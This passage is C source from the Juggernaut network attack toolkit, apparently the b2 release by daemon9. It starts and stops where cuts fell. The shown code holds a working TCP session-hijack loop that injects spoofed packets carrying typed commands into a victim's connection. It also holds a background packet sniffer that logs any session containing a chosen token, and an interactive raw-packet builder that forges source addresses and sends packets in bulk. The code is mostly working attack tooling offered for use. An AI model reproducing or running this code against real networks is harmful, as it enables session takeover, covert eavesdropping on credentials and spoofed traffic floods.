return; } signal(SIGALRM,nettimeout); alarm(0); alarm(netreadtimeout); /* Here we setup the initial hijack state. We need to desynch the connection, and the next packet that comes by will be the catalyst. */ while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){ tpack.tcp.seq=tcphp->ack_seq; tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len); tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len); sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin)); break; } alarm(0); while(sigsentry){ /* Main hijack loop */ if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){ if(!tcphp->psh)continue; /* If this is not data, ignore it */ dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),0); bzero(&buf,sizeof(buf)); fgets(buf,sizeof(buf),stdin); if(!buf[1])continue; /* No input data (CR) */ len=strlen(buf)+1; bcopy(buf,tpack.payload,len--); tpack.tcp.psh=1; tpack.tcp.check=0; tpack.ip.check=0; tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); tpack.tcp.seq=tcphp->ack_seq; tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); ppheader->tlen=htons(TCPHDR+len); bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len); tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len); sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin)); } } crst(target); /*free(tempBuf); XXX */ close(tlinksock); } /* * Packet sniffer parses TCP packets for token. Logs that packet, along with * the next 'enticement` number of packets. Not really all that robust. */ void bloodhound(token,enticementfactor) char *token; int enticementfactor; { void parsep(char *,int,FILE *); void shadow(); char *hostLookup(unsigned long); FILE *fp=0; time_t tp=0; int length=0; int grabflag=0; /* Time to grab some packets */ unsigned long targetsourceip=0; unsigned short targetsourceport=0; int tlinksock=tap(DEVICE); if(!(fp=fopen(SNIFLOG,"a+"))){ /* Log to file */ if(verbosity){ fprintf(stderr,"Cannot open file for logging. [fatal]\n"); fprintf(stderr,"[cr]"); } exit(0); } ALIGNNETPOINTERS(); fprintf(stderr,"\nDropping to background, sniffing for smarmy tidbits...\n"); shadow(); /* Dropped to the background */ fprintf(stderr,"\nSend a SIGKILL to %d when you are thorugh.\n",getpid()); fprintf(fp,"\n---------------------------------------------------------------------\n[ Juggernaut bloodhound module log: token == '%s' ]\n",token); time(&tp); fprintf(fp,"[ Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp)); fflush(fp); while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP){ length=htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp); if((!grabflag)&&(strstr((epack.payload-2),token))){ grabflag=enticementfactor; targetsourceip=iphp->saddr; targetsourceport=tcphp->source; fprintf(fp,"\n\t %s [%d]\t<-->\t %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); parsep(epack.payload-2,length,fp); } if(grabflag){ /* We have a session marked and are logging it */ if(iphp->daddr==targetsourceip&&tcphp->dest==targetsourceport){ parsep(epack.payload-2,length,fp); grabflag--; } } } /* NOTREACHED */ } /* * Packet parser. Print the packet out... */ void parsep(payload,length,fp) char *payload; int length; FILE *fp; { register int tickytacky=0; for(tickytacky=0;tickytacky<length;tickytacky++){ if(payload[tickytacky]==0xd){ /* newline characater */ fprintf(fp,"\n"); continue; } if(isprint(payload[tickytacky]))fprintf(fp,"%c",payload[tickytacky]); } fflush(fp); } /* * Handles network timeouts. */ void nettimeout(){ alarm(0); longjmp(env,1); } <--> <++> Juggernaut/NumberOneCrush/prometheus.c /* * * Juggernaut * Version b2 * * 1996/7 Guild productions * daemon9[guild|phrack|r00t] * * comments to route@infonexus.com * * This coding project made possible by a grant from the Guild corporation * * prometheus.c - the packet assemby workshop module. Each of the main * packet assembly subfunctions will end up calling the ip assembler to build * the IP portion and send it (them) out. * * Too many dependencies in menu.c * * Shout out to Nirva for some suggestions/help. Nirva rules, BTW. I love * Nirva. You should too. * */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <time.h> #include <netinet/in.h> #include <unistd.h> #include <arpa/inet.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <linux/socket.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/udp.h> #include <linux/icmp.h> #include <linux/if_ether.h> #include <linux/if.h> #define MINIBUF 10 #define BUFSIZE 512 #define ETHHDR 14 #define PHDR 12 #define TCPHDR 20 #define UDPHDR 8 #define IPHDR 20 #define NOTRANSPORT 0x00 #define TCPTRANSPORT 0x01 #define UDPTRANSPORT 0x02 #define ICMPTRANSPORT 0x04 struct tpak{ /* TCP packet */ struct tcphdr tcp; char payload[BUFSIZE]; }tpack; struct upak{ /* UDP packet */ struct udphdr udp; char payload[BUFSIZE]; }upack; struct ipak{ /* ICMP packet */ struct icmphdr icmp; char payload[BUFSIZE]; }ipack; struct rippak{ /* IP packet */ struct iphdr ip; char payload[BUFSIZE+20]; /* Payload + transport header */ }rippack; int woe; /* Global var to let us know where to return to... */ extern int verbosity; /* This will change when IP/TCP options are implemented... */ #define RIPPACKETSIZE 552 /* IP header + transport header of up to 20 bytes + 512 byte payload */ int prometheus(type) int type; { void tcpa(); void udpa(); void icmpa(); void igmpa(); void ripa(int); bzero(&rippack,sizeof(rippack)); woe=0; switch(type){ case 1: tcpa(); /* TCP */ break; case 2: udpa(); /* UDP */ break; case 3: icmpa(); /* ICMP */ break; case 4: ripa(NOTRANSPORT); /* RAW IP with no transport and no payload */ break; case 5: return(woe=1); /* Done assembling packets */ default: break; /* bad input -- not done */ } return(woe); } /* * TCP assembler */ void tcpa(){ void ripa(int); void mwipe(); void mpktatcp(int,unsigned short,unsigned short,unsigned long,unsigned long,char *,unsigned short,char *); char buf[2*MINIBUF]; unsigned long val; int packetready=0; /* flag bits */ char data[4*MINIBUF]={0},flags[MINIBUF]={0},filename[4*MINIBUF]={0}; int i,j,fd,loopsentry=1; bzero(&tpack,sizeof(tpack)); srandom((unsigned)time(0)); /* seed psuedo random number generator */ while(loopsentry){ mwipe(); mpktatcp(packetready,ntohs(tpack.tcp.source),ntohs(tpack.tcp.dest),ntohl(tpack.tcp.seq),ntohl(tpack.tcp.ack_seq),flags,ntohs(tpack.tcp.window),data); fgets(buf,sizeof(buf),stdin); if(!(val=atoi(buf)))continue; switch(val){ case 1: /* Source Port */ fprintf(stderr,"\nSource Port (0 - 65535) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ tpack.tcp.source=htons(random()&0xffff); packetready|=0x01; break; } if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){ if(packetready&0x01)packetready^=0x01; /* Clear flag if set */ tpack.tcp.source=0; break; } tpack.tcp.source=htons(val); packetready|=0x01; break; case 2: /* Destination Port */ fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ tpack.tcp.dest=htons(random()&0xffff); packetready|=0x02; break; } if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){ if(packetready&0x02)packetready^=0x02; tpack.tcp.dest=0; break; } tpack.tcp.dest=htons(val); packetready|=0x02; break; case 3: /* Sequence Number */ fprintf(stderr,"\nSequence Number (0 - 4294967295) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ tpack.tcp.seq=htonl(random()); packetready|=0x04; break; } if(buf[0]=='q'||buf[0]=='-'){ if(packetready&0x04)packetready^=0x04; tpack.tcp.seq=0; break; } tpack.tcp.seq=htonl(strtoul(buf,0,10)); packetready|=0x04; break; case 4: /* Acknowledgement Number */ fprintf(stderr,"\nAcknowledgement Number (0 - 4294967295) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ tpack.tcp.ack_seq=htonl(random()); packetready|=0x08; break; } if(buf[0]=='q'||buf[0]=='-'){ if(packetready&0x08)packetready^=0x08; tpack.tcp.ack_seq=0; break; } tpack.tcp.ack_seq=htonl(strtoul(buf,0,10)); packetready|=0x08; break; case 5: /* Control Flags */ i=0; bzero(flags,sizeof(flags)); fprintf(stderr,"\nURG? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; tpack.tcp.urg=0; break; } if(buf[0]=='y'){ tpack.tcp.urg=1; flags[i++]='U'; } fprintf(stderr,"\nACK? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; tpack.tcp.ack=0; break; } if(buf[0]=='y'){ tpack.tcp.ack=1; flags[i++]='A'; } fprintf(stderr,"\nPSH? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; tpack.tcp.psh=0; break; } if(buf[0]=='y'){ tpack.tcp.psh=1; flags[i++]='P'; } fprintf(stderr,"\nRST? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; tpack.tcp.rst=0; break; } if(buf[0]=='y'){ tpack.tcp.rst=1; flags[i++]='R'; } fprintf(stderr,"\nSYN? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; tpack.tcp.syn=0; break; } if(buf[0]=='y'){ tpack.tcp.syn=1; flags[i++]='S'; } fprintf(stderr,"\nFIN? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; tpack.tcp.fin=0; break; } if(buf[0]=='y'){ tpack.tcp.fin=1; flags[i++]='F'; } if(!flags[0])strcpy(flags,"none set"); packetready|=0x10; break; case 6: /* Window Size */ fprintf(stderr,"\nWindow Size (0 - 65535) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ tpack.tcp.window=htons(random()&0xffff); packetready|=0x20; break; } if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){ if(packetready&0x20)packetready^=0x20; tpack.tcp.window=0; break; } tpack.tcp.window=htons(val); packetready|=0x20; break; case 7: /* Data payload */ bzero(data,sizeof(data)); bzero(tpack.payload,sizeof(tpack.payload)); bzero(filename,sizeof(filename)); fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='c'){ /* Input from command line */ fprintf(stderr,"\nEnter Payload [q] >"); fgets(tpack.payload,sizeof(tpack.payload),stdin); strncpy(data,tpack.payload,sizeof(data)); packetready|=0x40; break; } if(buf[0]=='f'){ /* Input from file */ fprintf(stderr,"\nFilename [q] >"); if(buf[0]==0x0a||buf[0]=='q')break; fgets(filename,sizeof(filename),stdin); for(i=0;i<4*MINIBUF;i++)if(!filename[i])break; filename[--i]=0; /* Pesky Newline */ if((fd=open(filename,O_RDONLY))<0){ if(verbosity){ fprintf(stderr,"Cannot open file for reading.\n"); fprintf(stderr,"[cr]"); getchar(); } continue; } i=0; j=0; while(i<512){ j=read(fd,tpack.payload,sizeof(tpack.payload)); if(!j)break; /* No more bytes ta read */ i+=j; } strncpy(data,filename,sizeof(filename)); close(fd); packetready|=0x40; break; } if(packetready&0x40)packetready^=0x40; bzero(data,sizeof(data)); bzero(tpack.payload,sizeof(tpack.payload)); break; case 8: /* Return to previous menu */ loopsentry=0; bzero(&tpack,sizeof(tpack)); break; case 9: /* Return to Main */ loopsentry=0; woe=1; break; case 10: /* RIP assembler */ if(packetready==0x07f){ /* AND mask of all the options */ tpack.tcp.doff=5; /* Data offset */ ripa(TCPTRANSPORT); /* Checksum will be computed in ripa */ break; } continue; default: /* Bad input */ continue; } } } /* * UDP assembler */ void udpa(){ void ripa(int); void mwipe(); void mpktaudp(int,unsigned short,unsigned short,char *); char buf[2*MINIBUF]; unsigned long val; int packetready=0; /* flag bits */ char data[4*MINIBUF]={0},filename[4*MINIBUF]={0}; int i=0,j,fd=0,loopsentry=1; bzero(&upack,sizeof(upack)); srandom((unsigned)time(0)); while(loopsentry){ mwipe(); mpktaudp(packetready,ntohs(upack.udp.source),ntohs(upack.udp.dest),data); fgets(buf,sizeof(buf),stdin); if(!(val=atoi(buf)))continue; switch(val){ case 1: /* Source Port */ fprintf(stderr,"\nSource Port (0 - 65535) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q'){ if(packetready&0x01)packetready^=0x01; upack.udp.source=0; break; } if(buf[0]=='r'){ upack.udp.source=htons(random()&0xffff); packetready|=0x01; break; } if(!(int)(val=atoi(buf)))break; upack.udp.source=htons(val); packetready|=0x01; break; case 2: /* Destination Port */ fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q'){ if(packetready&0x02)packetready^=0x02; upack.udp.dest=0; break; } if(buf[0]=='r'){ upack.udp.dest=htons(random()&0xffff); packetready|=0x02; break; } if(!(int)(val=atoi(buf)))break; upack.udp.dest=htons(val); packetready|=0x02; break; case 3: /* Data payload */ bzero(data,sizeof(data)); bzero(upack.payload,sizeof(upack.payload)); bzero(filename,sizeof(filename)); fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='c'){ /* Input from command line */ fprintf(stderr,"\nEnter Payload [q] >"); fgets(upack.payload,sizeof(upack.payload),stdin); strncpy(data,upack.payload,sizeof(data)); packetready|=0x04; break; } if(buf[0]=='f'){ /* Input from file */ fprintf(stderr,"\nFilename [q] >"); if(buf[0]==0x0a||buf[0]=='q')break; fgets(filename,sizeof(filename),stdin); for(i=0;i<4*MINIBUF;i++)if(!filename[i])break; filename[--i]=0; if((fd=open(filename,O_RDONLY))<0){ if(verbosity){ fprintf(stderr,"Cannot open file for reading.\n"); fprintf(stderr,"[cr]"); getchar(); } continue; } i=0; j=0; while(i<512){ j=read(fd,upack.payload,sizeof(upack.payload)); if(!j)break; i+=j; } strncpy(data,filename,sizeof(filename)); close(fd); packetready|=0x04; break; } if(packetready&0x04)packetready^=0x04; bzero(data,sizeof(data)); bzero(upack.payload,sizeof(upack.payload)); break; case 4: /* Return to previous menu */ loopsentry=0; bzero(&upack,sizeof(upack)); break; case 5: /* Retuen to Main */ loopsentry=0; woe=1; break; case 6: /* RIP assembler */ if(packetready==0x07){ upack.udp.len=htons(UDPHDR+BUFSIZE); ripa(UDPTRANSPORT); break; } continue; default: /* bad input */ continue; } } } /* * ICMP assembler * This is no where as robust as it should be. In fact, it doesn't really * create legal ICMP packets. Oh well. Next version. I am tired of * packet assembly duldrums... */ void icmpa(){ void ripa(int); void mwipe(); void mpktaicmp(int,unsigned short,unsigned short,char *); char buf[2*MINIBUF]; unsigned long val; int packetready=0; /* flag bits */ char data[4*MINIBUF]={0},filename[4*MINIBUF]={0}; int i=0,j,fd=0,loopsentry=1; bzero(&ipack,sizeof(ipack)); while(loopsentry){ mwipe(); mpktaicmp(packetready,ipack.icmp.type,ipack.icmp.code,data); fgets(buf,sizeof(buf),stdin); if(!(val=atoi(buf)))continue; switch(val){ case 1: /* Type */ fprintf(stderr,"\nType (0,3,4,5,8,9,10,11,12,13,14,15,16,17,18) [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q'){ if(packetready&0x01)packetready^=0x01; ipack.icmp.type=0; break; } if(!(int)(val=atoi(buf)))break; ipack.icmp.type=val; packetready|=0x01; break; case 2: /* Code */ fprintf(stderr,"\nCode (0,1 {2,3}) [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q'){ if(packetready&0x02)packetready^=0x02; ipack.icmp.code=0; break; } if(!(int)(val=atoi(buf)))break; ipack.icmp.code=val; packetready|=0x02; break; case 3: /* Data payload */ bzero(data,sizeof(data)); bzero(ipack.payload,sizeof(ipack.payload)); bzero(filename,sizeof(filename)); fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='c'){ /* Input from command line */ fprintf(stderr,"\nEnter Payload [q] >"); fgets(ipack.payload,sizeof(ipack.payload),stdin); strncpy(data,ipack.payload,sizeof(data)); packetready|=0x04; break; } if(buf[0]=='f'){ /* Input from file */ fprintf(stderr,"\nFilename [q] >"); if(buf[0]==0x0a||buf[0]=='q')break; fgets(filename,sizeof(filename),stdin); for(i=0;i<4*MINIBUF;i++)if(!filename[i])break; filename[--i]=0; if((fd=open(filename,O_RDONLY))<0){ if(verbosity){ fprintf(stderr,"Cannot open file for reading.\n"); fprintf(stderr,"[cr]"); getchar(); } continue; } i=0; j=0; while(i<512){ j=read(fd,upack.payload,sizeof(upack.payload)); if(!j)break; i+=j; } strncpy(data,filename,sizeof(filename)); close(fd); packetready|=0x04; break; } if(packetready&0x04)packetready^=0x04; bzero(data,sizeof(data)); bzero(ipack.payload,sizeof(ipack.payload)); break; case 4: loopsentry=0; bzero(&ipack,sizeof(ipack)); break; case 5: loopsentry=0; woe=1; break; case 6: if(packetready==0x07){ ripa(ICMPTRANSPORT); break; } continue; default: continue; } } } /* * IP assembler and xmitter. Transport layer checksum routines thanks to * Myth (Red, actually). */ void ripa(transport) int transport; { void mwipe(); void mpktaip(int,char *,char *,unsigned short,unsigned short,char *,char *,int,char *); char *hostLookup(unsigned long); unsigned long nameResolve(char *); unsigned short in_cksum(unsigned short *,int); char buf[2*MINIBUF]; unsigned long val; char tosflags[MINIBUF]={0},fflags[MINIBUF]={0},packettype[MINIBUF]={0}; char sip[2*MINIBUF]={0},dip[2*MINIBUF]={0},*tempBuf; int packetready=0; /* flag bits */ int i=0,j=0,k=0; /* Counters */ int loopsentry=1,number=0; struct sockaddr_in sin; struct psuedoHeader{ unsigned long saddr; unsigned long daddr; unsigned char null; unsigned char prot; unsigned short tlen; }*ppheader; extern int ripsock; bzero(&rippack,sizeof(rippack)); bzero((char *)&sin,sizeof(sin)); srandom((unsigned)time(0)); while(loopsentry){ i=0; mwipe(); mpktaip(packetready,tosflags,fflags,ntohs(rippack.ip.frag_off),rippack.ip.ttl,sip,dip,number,packettype); fgets(buf,sizeof(buf),stdin); if(!(val=atoi(buf)))continue; switch(val){ case 1: /* TOS */ bzero(tosflags,sizeof(tosflags)); fprintf(stderr,"\nMinimize Delay? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x01)packetready^=0x01; rippack.ip.tos=0; break; } if(buf[0]=='y'){ rippack.ip.tos|=0x10; tosflags[i++]='D'; } fprintf(stderr,"\nMaximize Throughput? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x01)packetready^=0x01; rippack.ip.tos=0; break; } if(buf[0]=='y'){ rippack.ip.tos|=0x08; tosflags[i++]='T'; } fprintf(stderr,"\nMaximize Reliability? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x01)packetready^=0x01; rippack.ip.tos=0; break; } if(buf[0]=='y'){ rippack.ip.tos|=0x04; tosflags[i++]='R'; } fprintf(stderr,"\nMinimize Monetary Cost? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x01)packetready^=0x01; rippack.ip.tos=0; break; } if(buf[0]=='y'){ rippack.ip.tos|=0x02; tosflags[i++]='C'; } if(!tosflags[0])strcpy(tosflags,"none set"); packetready|=0x01; break; case 2: /* Frag Flags */ bzero(fflags,sizeof(fflags)); fprintf(stderr,"\nMore Fragments? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x02)packetready^=0x02; rippack.ip.frag_off=0; break; } if(buf[0]=='y'){ rippack.ip.frag_off|=htons(0x4000); fflags[i++]='M'; } fprintf(stderr,"\nDon't Fragment? [yNq] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q'){ if(packetready&0x02)packetready^=0x02; rippack.ip.frag_off=0; break; } if(buf[0]=='y'){ rippack.ip.frag_off|=htons(0x2000); fflags[i++]='D'; } if(!fflags[0])strcpy(fflags,"none set"); packetready|=0x02; break; case 3: /* Frag Offset */ fprintf(stderr,"\nFragment Offset [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ rippack.ip.frag_off|=htons(random()&0x1fff); packetready|=0x04; break; } if(buf[0]=='q'||(val=atoi(buf))<0||val>8191){ if(packetready&0x04)packetready^=0x04; rippack.ip.frag_off&=~0x3fff; break; } rippack.ip.frag_off|=htons(val&0x1fff); packetready|=0x04; break; case 4: /* TTL */ fprintf(stderr,"\nTTL (0 - 255) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ rippack.ip.ttl=random()&0xff; packetready|=0x08; break; } if(buf[0]=='q'||(val=atoi(buf))<0||val>255){ if(packetready&0x08)packetready^=0x08; rippack.ip.ttl=0; break; } rippack.ip.ttl=val; packetready|=0x08; break; case 5: /* Source Address */ bzero(sip,sizeof(sip)); fprintf(stderr,"\nSource Address [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q'){ if(packetready&0x10)packetready^=0x10; rippack.ip.saddr=0; break; } if(buf[0]=='r'){ rippack.ip.saddr=htonl(random()); strncpy(sip,hostLookup(rippack.ip.saddr),sizeof(sip)); packetready|=0x10; break; } strncpy(sip,buf,sizeof(sip)); for(i=0;i<2*MINIBUF;i++)if(!sip[i])break; sip[--i]=0; if(!(rippack.ip.saddr=nameResolve(buf))){ fprintf(stderr,"Cannot resolve IP address.\n"); fprintf(stderr,"[cr]"); getchar(); bzero(sip,sizeof(sip)); if(packetready&0x10)packetready^=0x10; break; } packetready|=0x10; break; case 6: /* Destination Address */ bzero(dip,sizeof(dip)); fprintf(stderr,"\nDestination Address [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q'){ if(packetready&0x20)packetready^=0x20; rippack.ip.daddr=0; break; } if(buf[0]=='r'){ strncpy(dip,hostLookup(rippack.ip.daddr),sizeof(dip)); rippack.ip.daddr=htonl(random()); packetready|=0x20; break; } strncpy(dip,buf,sizeof(dip)); for(i=0;i<2*MINIBUF;i++)if(!dip[i])break; dip[--i]=0; if(!(rippack.ip.daddr=nameResolve(buf))){ fprintf(stderr,"Cannot resolve IP address.\n"); fprintf(stderr,"[cr]"); getchar(); bzero(dip,sizeof(dip)); if(packetready&0x20)packetready^=0x20; break; } packetready|=0x20; break; case 7: /* Number of packets to send */ fprintf(stderr,"\nAmount (1 - 65536) [qr] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='r'){ number=(random()&0xffff); packetready|=0x40; break; } if(buf[0]=='q'||(val=atoi(buf))<0||val>65536){ if(packetready&0x40)packetready^=0x40; number=0; break; } number=val; packetready|=0x40; break; case 8: /* Return */ loopsentry=0; bzero(&rippack,sizeof(rippack)); break; case 9: loopsentry=0; woe=1; break; case 10: if(packetready==0x7f){ sin.sin_family=AF_INET; sin.sin_port=0; rippack.ip.version=4; /* IPv4 */ rippack.ip.ihl=5; /* This will change if options are present */ switch(transport){ case NOTRANSPORT: /* IP packet only */ sin.sin_addr.s_addr=rippack.ip.daddr; rippack.ip.protocol=IPPROTO_IP; break; case TCPTRANSPORT: /* TCP */ sin.sin_port=tpack.tcp.source; sin.sin_addr.s_addr=rippack.ip.daddr; rippack.ip.protocol=IPPROTO_TCP; tempBuf=(char *)malloc(PHDR+TCPHDR+BUFSIZE); ppheader=(struct psuedoHeader *)tempBuf; ppheader->saddr=rippack.ip.saddr; ppheader->daddr=rippack.ip.daddr; ppheader->prot=IPPROTO_TCP; ppheader->null=0; ppheader->tlen=htons(TCPHDR+BUFSIZE); bcopy(&tpack,tempBuf+PHDR,PHDR+TCPHDR+BUFSIZE); tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+BUFSIZE); free(tempBuf); bcopy((char *)&tpack,(char *)&rippack.payload,TCPHDR+BUFSIZE); break; case UDPTRANSPORT: /* UDP */ sin.sin_port=upack.udp.source; sin.sin_addr.s_addr=rippack.ip.daddr; rippack.ip.protocol=IPPROTO_UDP; tempBuf=(char *)malloc(PHDR+UDPHDR+BUFSIZE); ppheader=(struct psuedoHeader *)tempBuf; ppheader->saddr=rippack.ip.saddr; ppheader->daddr=rippack.ip.daddr; ppheader->prot=IPPROTO_UDP; ppheader->null=0; ppheader->tlen=htons(UDPHDR+BUFSIZE); bcopy(&upack,tempBuf+PHDR,PHDR+UDPHDR+BUFSIZE); upack.udp.check=in_cksum((unsigned short *)tempBuf,PHDR+UDPHDR+BUFSIZE); free(tempBuf); bcopy((char *)&upack,(char *)&rippack.payload,UDPHDR+BUFSIZE); break; case ICMPTRANSPORT: /* ICMP */ sin.sin_addr.s_addr=rippack.ip.daddr; rippack.ip.protocol=IPPROTO_ICMP; break; default: /* Control should never fall here */ if(verbosity)perror("RIP Assembler [unknown transport]"); exit(1); } for(k=number,i=0;i<number;i++){ if((j=sendto(ripsock,&rippack,RIPPACKETSIZE,0,(struct sockaddr *)&sin,sizeof(sin)))<RIPPACKETSIZE){ fprintf(stderr,"Packet # %d: Wrote only %d bytes to raw socket\n",i,j); k--; if(verbosity)perror("RIP module sendto"); } } fprintf(stderr,"%d Packet(s) injected.\n",k); getchar(); break; } continue; default: continue; } } /* NOTREACHED */ } <--> <++> Juggernaut/NumberOneCrush/surplus.c /* * * Juggernaut * Version b2 * * 1996/7 Guild productions * daemon9[guild|phrack|r00t] * * comments to route@infonexus.com * * This coding project made possible by a grant from the Guild corporation * * surplus.c - helper functions * */ #include <string.h> #include <signal.h> #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/wait.h> #define HELPFILE "./ClothLikeGauze/.help" #define FBUFSIZE 80 #define MINIBUF 10 extern int verbosity; /* * IP address into network byte order */ unsigned long nameResolve(hostname) char *hostname; { struct in_addr addr; struct hostent *hostEnt; if((addr.s_addr=inet_addr(hostname))==-1){ if(!(hostEnt=gethostbyname(hostname)))return(0); bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); } return addr.s_addr; } #ifdef FASTCHECK /* * Fast IP checksum routine. */ unsigned short in_cksum(buff,len) unsigned char *buff; int len; { unsigned long sum = 0; if (len>3){ __asm__("clc\n" "1:\t" "lodsl\n\t" "adcl %%eax, %%ebx\n\t" "loop 1b\n\t" "adcl $0, %%ebx\n\t" "movl %%ebx, %%eax\n\t" "shrl $16, %%eax\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b" (sum) , "=S" (buff) : "0" (sum), "c" (len >> 2) ,"1" (buff) : "ax", "cx", "si", "bx" ); } if(len&2){ __asm__("lodsw\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b" (sum), "=S" (buff) : "0" (sum), "1" (buff) : "bx", "ax", "si"); } if(len&1){ __asm__("lodsb\n\t" "movb $0, %%ah\n\t" "addw %%ax, %%bx\n\t" "adcw $0, %%bx" : "=b" (sum), "=S" (buff) : "0" (sum), "1" (buff) : "bx", "ax", "si"); } sum =~sum; return(sum&0xffff); } #else /* * IP Family checksum routine */ unsigned short in_cksum(ptr,nbytes) unsigned short *ptr; int nbytes; { register long sum=0; /* assumes long == 32 bits */ u_short oddbyte; register u_short answer; /* assumes u_short == 16 bits */ while(nbytes>1){ sum+=*ptr++; nbytes-=2; } if(nbytes==1){ /* mop up an odd byte, if necessary */ oddbyte=0; /* make sure top half is zero */ *((u_char *)&oddbyte)=*(u_char *)ptr; /* one byte only */ sum+=oddbyte; } sum+=(sum>>16); /* add carry */ answer=~sum; /* ones-complement, then truncate to 16 bits */ return(answer); } #endif /* * Network byte order into IP address */ char *hostLookup(in) unsigned long in; { #define BUFSIZE 256 char hostname[BUFSIZE]={0}; struct in_addr addr; #ifdef USENAME struct hostent *hostEnt; #endif addr.s_addr=in; #ifdef USENAME hostEnt=gethostbyaddr((char *)&addr,sizeof(struct in_addr),AF_INET); if(!hostEnt) #endif strcpy(hostname,inet_ntoa(addr)); /* KLUDGEY. */ #ifdef USENAME else strcpy(hostname,hostEnt->h_name); #endif return(strdup(hostname)); } /* * Simple daemonizing procedure. */ int shadow(void){ int fd,pid; extern int errno; signal(SIGTTOU,SIG_IGN); /* Ignore these signals */ signal(SIGTTIN,SIG_IGN); signal(SIGTSTP,SIG_IGN); switch((pid=fork())){ case 0: /* Child */ break; default: exit(0); /* Parent */ case -1: fprintf(stderr,"Forking Error\n"); exit(1); } setpgrp(); if((fd=open("/dev/tty",O_RDWR))>=0){ ioctl(fd,TIOCNOTTY,(char *)NULL); close(fd); } errno=0; chdir("/"); umask(0); return(pid); } /* * Keeps processes from zombiing on us... */ static void reaper(signo) int signo; { pid_t pid; int sys; pid=wait(&sys); signal(SIGCHLD,reaper); return; } /* * Dump usage and exit. */ void usage(nomenclature) char *nomenclature; { fprintf(stderr,"\n\nUsage:\t%s [-h] [-s TOKEN [-e xx] ] [-v] [-t xx]\n\n -h terse help -H expanded help for those 'specially challanged' people... -s dedicated sniffing (bloodhound) mode, in which TOKEN is found enticing -e enticement factor (defaults to 16) -v decrease verbosity 